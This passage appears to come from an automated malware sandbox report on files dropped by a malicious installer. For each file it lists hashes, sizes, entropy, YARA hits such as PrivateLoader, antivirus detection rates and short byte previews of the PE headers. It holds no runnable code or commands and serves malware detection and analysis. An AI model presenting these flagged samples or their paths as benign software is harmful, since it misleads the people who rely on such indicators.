                                      SSDEEP:6144:tMfrO6FHMcQTkvu0aaQEv1pE0EAPMrGWsWDWidF0HQszCZ2Ftppb9Y81+k7pq7FX:tsOUHzvu0aaRS2z2
                                      MD5:06EE576F9FDC477C6A91F27E56339792
                                      SHA1:4302B67C8546D128F3E0AB830DF53652F36F4BB0
                                      SHA-256:035373A454AFD283DA27EBF569AB355BE7DB470A1A30C3695E18C984B785E1F8
                                      SHA-512:E5B337158905651E2740378615FCD9A8BA2B5E46F02C75BE20C22E89B4CB40E8F1DFEC1C5C1135F4D59114DA9200A772F591622EDDB865880B296321D80FB616
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 66%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......bT..&5..&5..&5..2^..,5..2^...5..2^..45..-Z..75..-Z..05..-Z...5..2^..%5..&5..{5...Z..%5...Z..'5..&5|.'5...Z..'5..Rich&5..........................PE..L.....ca.................\...................p....@.......................................@.....................................(........]...................`..p.......................................@............p..,............................text....[.......\.................. ..`.rdata...j...p...l...`..............@..@.data...............................@....rsrc....].......^..................@..@.reloc..p....`.......4..............@..B........................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1422336
                                      Entropy (8bit):6.458131255146092
                                      Encrypted:false
                                      SSDEEP:24576:ur0Y0b3wTBY0zc3OHmIOss9/DQTBlFadP6WNltPSQv:ub6gT20iOHmIPWDQll86Ytfv
                                      MD5:F3B4EE77D66819821E9921B61F969BAE
                                      SHA1:4615610C80FF5D2E251D0D91ABBE623ACFA74F7C
                                      SHA-256:DD2FF55CF7F143254E8478619014BC083E65DD48EF2329E45D39FE65D5E5CC73
                                      SHA-512:58DED47D2BCD88D6F79D35F7406BFCF22B889B52E6F293C12201DE5CEB834D3905472D9C384B469BB42DE74E3EAB429A39918B3368107002C1F4ABC252328D6E
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_Generic_malware, Description: Yara Generic_malware, Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 85%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$..`...`...`...t..u...t..m...t........G......a.....p.....j.........t..m...`.........h.....y.a......a...Rich`...................PE..d....XYa.........."......N...b.......3.........@.............................0............`.................................................<...x.......<.... ..(................$......p.......................(.......0............`..(............................text...\L.......N.................. ..`.rdata......`.......R..............@..@.data...$.... ......................@....pdata..(.... ......................@..@_RDATA..............................@..@.rsrc...<...........................@..@.reloc...$.......&..................@..B........................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1229031
                                      Entropy (8bit):7.871335205612416
                                      Encrypted:false
                                      SSDEEP:24576:b062cSEk8zNlLLsZ0zlqHdHvVkOvdxG3HgdBO6RFi:A6PaUsIgRVkOvdUOBU
                                      MD5:7C6B2DC2C253C2A6A3708605737AA9AE
                                      SHA1:CF4284F29F740B4925FB2902F7C3F234A5744718
                                      SHA-256:B45C9DE845522095BBFA55166B519B2BE36A08CEA688491B9F339E862E79C3BA
                                      SHA-512:19579900D07912096641CC7381131FF6FCF60FFFC99CDAB23F7D8A577AA926BBF0E885A3A7869298BBFC0A05E276C1D5F45712812E4DF6980E9554FC48162B07
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 58%
                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........}.m...m...m..#.a..m..#.c..m..#.b..m....W..m...3./.m...3./.m...3./.m.......m.......m...m..nm...3./.m...3./.m...3o..m...3./.m..Rich.m..........................PE..L... .m`.................b..........0?............@.......................................@.............................4.......<............................`.. (.. ...T...........................H...@............... ............................text....a.......b.................. ..`.rdata..$............f..............@..@.data....M... ......................@....didat..\....p......................@....rsrc...............................@..@.reloc.. (...`...*..................@..B................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):442368
                                      Entropy (8bit):3.7390611649225955
                                      Encrypted:false
                                      SSDEEP:12288:3hhlDEI+iEHvpbAC7dMuke/3FIVJIKlO5g:Xl9KIV
                                      MD5:5721981400FAF8EDB9CB2FA1E71404A2
                                      SHA1:7C753BAFD9AC4A8C8F8507B616EE7D614494C475
                                      SHA-256:15D244BA6413C14E9E0E72B8AE123CA49812B15398208E4AAB1422160DA75E0F
                                      SHA-512:4F4E36EF1EE116681B780FE4E71F97215797DF55E51E3818D7B7495F284723FCFFD233FC01A66863573C2AD70B77821EF0880A3B58B300C5233D5A636B019C57
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....z................0.................. ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H......../..00...........................................................0..........~....u....s....z&.....*.................2(.... .F..j*....r...p(....*.s....%.}..........s....o....9....s....z*....(.........*2.s....(....*...v.(......rg..p~....o....(....*....{....*.0..i........:....~........(......~....:$.........(.........(....(....(.........~....{....~.....o....(....o....}....*....0...........o......o....(.....(.....o....*.6..(....(....*...0..A.......~.....s.......8.........
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):348672
                                      Entropy (8bit):6.015664208947374
                                      Encrypted:false
                                      SSDEEP:6144:IQ31DWvFRu0pIIC6nVm6j4qYmSkF/bzOdzzJIlt+MSq:9DWvSIvVNMqYmSkF/CzNIls
                                      MD5:BE60D71B303F2AAE5618315147C7D3F9
                                      SHA1:3193AA204C2CF5A82AC532AB9FD436ACAD7953C1
                                      SHA-256:E4BA726FBD2C56CD2426BA04823637264BE89A9807A935D0939DC1578BDD951E
                                      SHA-512:2C15B655B0CC12EB7BD5329A922DBDBA6F226748F45D03C777980CCE79A841C28A1D9DC1283D0A5C361E4EBD537F2BA4C1B44F59D3A5FAF132EAE48F1F884A77
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2&.tvG.'vG.'vG.'.1Q'mG.'.1d'DG.'.1e'.G.'.?\'sG.'vG.'.G.'.1`'wG.'.1U'wG.'.1R'wG.'RichvG.'................PE..L......^......................(.....`.............@...........................,.................................................<.....+..s....................+.....0...................................@............................................text............................... ..`.data...P-'.........................@....rsrc....s....+..t..................@..@.reloc........+......b..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):223232
                                      Entropy (8bit):7.91725038805347
                                      Encrypted:false
                                      SSDEEP:6144:Kk3jgivfCVSRrLV7yAVzKZIjCbanUKWw+ba//PXHUo:30iH0iVPVzKOOunLWf2//0
                                      MD5:D09BE1F47FD6B827C81A4812B4F7296F
                                      SHA1:028AE3596C0790E6D7F9F2F3C8E9591527D267F7
                                      SHA-256:0DE53E7BE51789ADAEC5294346220B20F793E7F8D153A3C110A92D658760697E
                                      SHA-512:857F44A1383C29208509B8F1164B6438D750D5BB4419ADD7626986333433E67A0D1211EC240CE9472F30A1F32B16C8097ACEBA4B2255641B3D8928F94237F595
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 13%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J4e`....Y......!..............................Dk.......................................... .........................-... ...<....................................................................................................................text............t..................`.P..data.... ...........z..............@.`..rdata...........F..................@.`./4...............4..................@.0..bss....h.............................`..edata..............................@.0..idata... ..........................@.0..CRT................................@.0..tls................................@.0..rsrc...............................@.0..reloc...@.......&..................@.0./14..........P.......8..............@.@./29...... ...`.......:..............@.../41..................J..............@.../55..................L..............@.../67..................N..
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):55808
                                      Entropy (8bit):6.9891040161841085
                                      Encrypted:false
                                      SSDEEP:768:W//WT2mbP+7x4Mx5KzVAn/QqvtdZs8LlR67diTNh4joK7qmQhyOl4UuGoxX9j3D:WHIK1R2VA/Qqvtzz67dbn1QhyOl4UuD
                                      MD5:E6E578373C2E416289A8DA55F1DC5E8E
                                      SHA1:B601A229B66EC3D19C2369B36216C6F6EB1C063E
                                      SHA-256:43E86D650A68F1F91FA2F4375AFF2720E934AA78FA3D33E06363122BF5A9535F
                                      SHA-512:9DF6A8C418113A77051F6CB02745AD48C521C13CDADB85E0E37F79E29041464C8C7D7BA8C558FDD877035EB8475B6F93E7FC62B38504DDFE696A61480CABAC89
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: MALWARE_Win_DLInjector03, Description: Detects unknown loader / injector, Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libcurlpp.dll, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 18%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Gf`....B......!.........T.......0............(k.........................`......x......... ...................... ..0F.. @..$...........................DA...............................?.......................................................text............4..................`.P..data................:..............@.0..rdata...............<..............@.`./4.......@...........B..............@.0..bss..................................`..edata...P... ...H...R..............@.0..idata... ...p......................@.0..CRT................................@.0..tls................................@.0..reloc..............................@.0./14.................................@.@./29...... ..........................@.../41.................................@.../55.................................@.../67.................................@.0./80.......... ..........
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                      Category:dropped
                                      Size (bytes):116238
                                      Entropy (8bit):6.249236557413483
                                      Encrypted:false
                                      SSDEEP:3072:nti6N0WeF35Ro7hAWP6cagLSuf6LG3qSbKE4M:ti6N2F33wGJVuHuE
                                      MD5:9AEC524B616618B0D3D00B27B6F51DA1
                                      SHA1:64264300801A353DB324D11738FFED876550E1D3
                                      SHA-256:59A466F77584438FC3ABC0F43EDC0FC99D41851726827A008841F05CFE12DA7E
                                      SHA-512:0648A26940E8F4AAD73B05AD53E43316DD688E5D55E293CCE88267B2B8744412BE2E0D507DADAD830776BF715BCD819F00F5D1F7AC1C5F1C4F682FB7457A20D0
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....n.........................0................ .........................u.................................... ..$...........................D........................................................text....\.......^..................`.P`.data...,....p.......b..............@.0..rdata..T............d..............@.`@/4.......4.......4...r..............@.0@.bss..................................`..edata..u...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..$.... ......................@.0B................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                      Category:dropped
                                      Size (bytes):662528
                                      Entropy (8bit):7.222450867745387
                                      Encrypted:false
                                      SSDEEP:12288:ZGRoW1chMjnv+gvJhb6bmpPSmCnh4o0v4Mc2jTrKoDSwq/3PmkfT4CmwcMcP1uE:uowcmBhKmlC4o0v4k1
                                      MD5:5E279950775BAAE5FEA04D2CC4526BCC
                                      SHA1:8AEF1E10031C3629512C43DD8B0B5D9060878453
                                      SHA-256:97DE47068327BB822B33C7106F9CBB489480901A6749513EF5C31D229DCACA87
                                      SHA-512:666325E9ED71DA4955058AEA31B91E2E848BE43211E511865F393B7F537C208C6B31C182F7D728C2704E9FC87E7D1BE3F98F5FEE4D34F11C56764E1C599AFD02
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 47%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....H...........0.......`.....o.........................`............... ..........................w.. @..$...........................DA...............................?.......................................................text....P.......B..................`.P..data.... ...`.......F..............@.`..rdata...........>...H..............@.`./4...........`......................@.0..bss..................................`..edata...........x...6..............@.0..idata... ...p......................@.0..CRT................................@.0..tls................................@.0..reloc...........P..................@.0..aspack.. ...0......................`....adata.......P......................@...................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                      Category:dropped
                                      Size (bytes):70656
                                      Entropy (8bit):6.292322392729986
                                      Encrypted:false
                                      SSDEEP:1536:xPCESXKWzkxTz8uLfdkWr2sUX8YNKykl1wwwwUXrMZE4cYdz:x6baWwxH8EzSHYZE4cYdz
                                      MD5:1E0D62C34FF2E649EBC5C372065732EE
                                      SHA1:FCFAA36BA456159B26140A43E80FBD7E9D9AF2DE
                                      SHA-256:509CB1D1443B623A02562AC760BCED540E327C65157FFA938A22F75E38155723
                                      SHA-512:3653F8ED8AD3476632F731A3E76C6AAE97898E4BF14F70007C93E53BC443906835BE29F861C4A123DB5B11E0F3DD5013B2B3833469A062060825DF9EE708DC61
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,.Q...........#................@..............d......................................... ...................... ..,....@..,....p..P.......................(............................`.......................A..d............................text...............................`.P`.data...............................@.0..rdata..............................@.`@.bss..................................`..edata..,.... ......................@.0@.idata..,....@......................@.0..CRT....0....P......................@.0..tls.... ....`......................@.0..rsrc...P....p......................@.0..reloc..(...........................@.0B................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):2249157
                                      Entropy (8bit):6.013411034364978
                                      Encrypted:false
                                      SSDEEP:24576:WuaTARYeYm0Xfw1twSiIr9ZUGRY6mPMol3juQ55313N:WuXCfGRnql3F
                                      MD5:33D05F6171D18F49EDD9C5B1BC5B8C72
                                      SHA1:DC5CEB79B3E91225EF363EE9BAF9A32877BD1FE9
                                      SHA-256:299D4AFC166F5AABFDD48C1477BAC071E3BE9126756FC7E57925AA49F8D9CF85
                                      SHA-512:EDAE7BFD931B06D2725ED88AC6E14AD800DF8A867FE29CFD76832B44546E9C562FD428C802E9050DF8C9A56E87A4EE3862B4488A8143A99B18E6C56988CC7935
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 68%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....yda....aY...............T....................@..................................$#....... .................................(............................................................Y.......................... ............................text...............................`.P`.data...............................@.`..rdata....... ......................@.`@/4..................................@.0@.bss.........p........................`..idata..(............D..............@.0..CRT....4............T..............@.0..tls.................V..............@.0./14..................X..............@.@B/29..................Z..............@..B/41..........P......................@..B/55......U...p...V..................@..B/67.....8............Z..............@.0B/80..................\..............@..B/91.....8............`..............@..B/102....................
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):2
                                      Entropy (8bit):1.0
                                      Encrypted:false
                                      SSDEEP:3:i:i
                                      MD5:AC6AD5D9B99757C3A878F2D275ACE198
                                      SHA1:439BAA1B33514FB81632AAF44D16A9378C5664FC
                                      SHA-256:9B8DB510EF42B8ED54A3712636FDA55A4F8CFCD5493E20B74AB00CD4F3979F2D
                                      SHA-512:BFCDCB26B6F0C288838DA7B0D338C2AF63798A2ECE9DCD6BC07B7CADF44477E3D5CFBBA5B72446C61A1ECF74A0BCCC62894EA87A40730CD1D4C2A3E15A7BB55B
                                      Malicious:false
                                      Preview:MZ
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4734
                                      Entropy (8bit):3.240998519166369
                                      Encrypted:false
                                      SSDEEP:96:pwpIiYkXkkXfkuguWj0QGs0Qy0QgF0QXd0Q20QkXKSgVXa2szeuzSzbxGQI5lmCf:pFle+ulCQRoeyOkNR
                                      MD5:1329A040113E3CE278A74FD462C4A271
                                      SHA1:344AD4EDF68B67BC84CB685671C53F6E15A1A9D8
                                      SHA-256:626186FF798A355F206FB1D3D0CA4576DDC256481D208C74D56478064053241D
                                      SHA-512:071D0CA4CE42E2C60911395961E4D14DA07E976C07316E433EABF919F582F21CD4A25DABC13E7344EBBCC0A0D8CDEE72FCCCBBDF76CE20EAB362D8FA0208FE72
                                      Malicious:false
                                      Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.5.9.2. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.3.4.8.7.2.6. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Users\user\AppData\Local\Temp\09xU.exE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):237058
                                      Entropy (8bit):6.878798551986205
                                      Encrypted:false
                                      SSDEEP:6144:RvgEu4Usp79TKBSPFGJoqLZ+hdN1i/JlV6Ke22E:BAkB9pPFOcoJJ
                                      MD5:973C9CF42285AE79A7A0766A1E70DEF4
                                      SHA1:4AB15952CBC69555102F42E290AE87D1D778C418
                                      SHA-256:7163BFAAAA7ADB44E4C272A5480FBD81871412D0DD3ED07A92E0829E68EC2968
                                      SHA-512:1A062774D3D86C0455F0018F373F9128597B676DEAD81B1799D2C2F4F2741D32B403027849761251F8389D248466BCD66836E0952675ADCD109CC0E950EAEC85
                                      Malicious:false
                                      Preview:.`.^..i..e.r.F.B.P`...&.{.6./...)~33.]..h...^..I.E`.........................................<..U..{..&..^.,-P7..3Q...S(.U.W...L.-..pW..W.tJ.1..N04Ut....R?..'.ES......bS...jB.p.........Q.k..H...TZ'...AU@..\.t/..HD...9L.........................................c/.....:..zP.m[."RFs(....n..H^.#..$.p...n^.S....B.......p...*..Ea.h....0..[E.~mM.F.Y.9.=.n +n..$......:..k*.....It:T....G.:W.c...[..V.........................................C.FU..G..fc."Z...F.{..G...0$...7P.T.-.....3*.P....G..TT;..M.f..~B-&3..+...V>s....'.E.c.[....Y?....`..F...N]..`....q.2..X.q.........................................|C&..A...c]..2.......,}?.^j..K..o......IL.Jp.+c?...0..i.:..-:..MU...Y..!T....XI......PJ...K~.....'+n.8...A<.Y!n.v.4E......!%7i.........................................`..T.#.....%Ws[!.q...f U....<.+}..#..a.W|.5.......}.....'"..XL....n...L.p0.}kja..7..z.s..2.^..S..D .U.~$.NI..;...5......*.^...9...........................................K...0.C...{g{...+.P.6....bS......'_
                                      Process:C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):3533154
                                      Entropy (8bit):7.990933339216253
                                      Encrypted:true
                                      SSDEEP:98304:DsCvLUBsg8IAEVN9nlglKZlLyCBk0v4W7W4YUMw8MB:DxLUCg57LyCBkYW43RRB
                                      MD5:0DB8584A650C251CC2BA26F73DADC3DC
                                      SHA1:CCE2D23884DC2F50FDB230DAEF54166124D503CE
                                      SHA-256:B559E35B8069E6858E710B1774213FED76ED4F1ACB4B74901F0F6F8FC33E9C9B
                                      SHA-512:3F5E67ED270C0290064B01BBC8123373E5B76BC36F8B42B531DFC93701A151C09E374AEED404DFD70D67DD0128576FC1141A12FE22F5BBD22A337631444E8DE1
                                      Malicious:false
                                      Preview:........,.......,.......\...................................................................................................................................................................................................................................................................G...................J...................u...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1350528
                                      Entropy (8bit):7.079863710734355
                                      Encrypted:false
                                      SSDEEP:24576:E1uoD1R9FlL8BKb3kL5OHJ988GgwMdzvFRG1:E1cKIklG/Mdv
                                      MD5:BD3523387B577979A0D86FF911F97F8B
                                      SHA1:1F90298142A27EC55118317EE63609664BCECB45
                                      SHA-256:A7E608F98F06260044D545F7279B8F859F7B7AF98AC2B2B79A3CD7AC3B2DAC36
                                      SHA-512:B37CB8DADDB526312F6BE439A3CB87FE62B69D44866DF708F10EB148455F09F90B0DCEE4360C1AE332D3936357FD4C474920AEBEC5AA8DDB005B617356C3D286
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 74%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....sB*..........................................@.............................................................................. ...p...H...........x...#.......b..................................................................................CODE....d........................... ..`DATA....P...........................@...BSS......................................idata... ......."..................@....reloc...b.......d..................@..P.rsrc....H...p...H...0..............@..P................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3527334
                                      Entropy (8bit):7.993086132744028
                                      Encrypted:true
                                      SSDEEP:98304:xsCvLUBsg8IAEVN9nlglKZlLyCBk0v4W7W4YUMw8MB:xxLUCg57LyCBkYW43RRB
                                      MD5:264FBE02A8ACAE2BA9A5144F8B947AAE
                                      SHA1:3DE9E174BB8105895C3EF65FE49233CBB34B8778
                                      SHA-256:AB3F08D6CFE4107EF0A285CE7862846169EC0E0F942B146E27E90919E48F9E24
                                      SHA-512:11E0A03EB5004159A1C7DC84BB52CAA7394740B87E375CE2BE0701BD8B12445AF01EE22AC7F9C91516B53CFCA7E13619623524122D489E34946038732A2FE067
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 68%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#.B...B...B...]...B...^...B...]...B...]...B...J...B...B...B...J...B...d...B...d...B....6..B.......B..]D...B..Rich.B..................PE..L.....n\........../..........n....................@..........................@..................................................x....0...............................................................................................................text...E........................... ..`.rdata...:.......<..................@..@.data....#..........................@....sxdata...... ......................@....rsrc........0......................@..@................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\09xU.exE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):498126
                                      Entropy (8bit):6.914893220137858
                                      Encrypted:false
                                      SSDEEP:6144:SeaGiJH+//KQsQqaizLQBwNPJj1OO028UHFdjXEEx4mJarZ7AMvl:6wO1dLQEvOO03K7GmEN7b
                                      MD5:7B25B2318E896FA8F9A99F635C146C9B
                                      SHA1:10F39C3EDB37B848974DA0F9C1A5BAA7D7F28EE2
                                      SHA-256:723B3B726B9A7394AC3334DF124A2033536B108A8EB87EC69E0A6E022C7DCD89
                                      SHA-512:A3B294E93E9D0A199AF21AD50AF8290C0E0AAA7487019480CA3FFD75AA8AD51C4D33612EC69275E4FA2273CA5E33FDFDF263BB0CE81AD43CE092147118FA8CA6
                                      Malicious:false
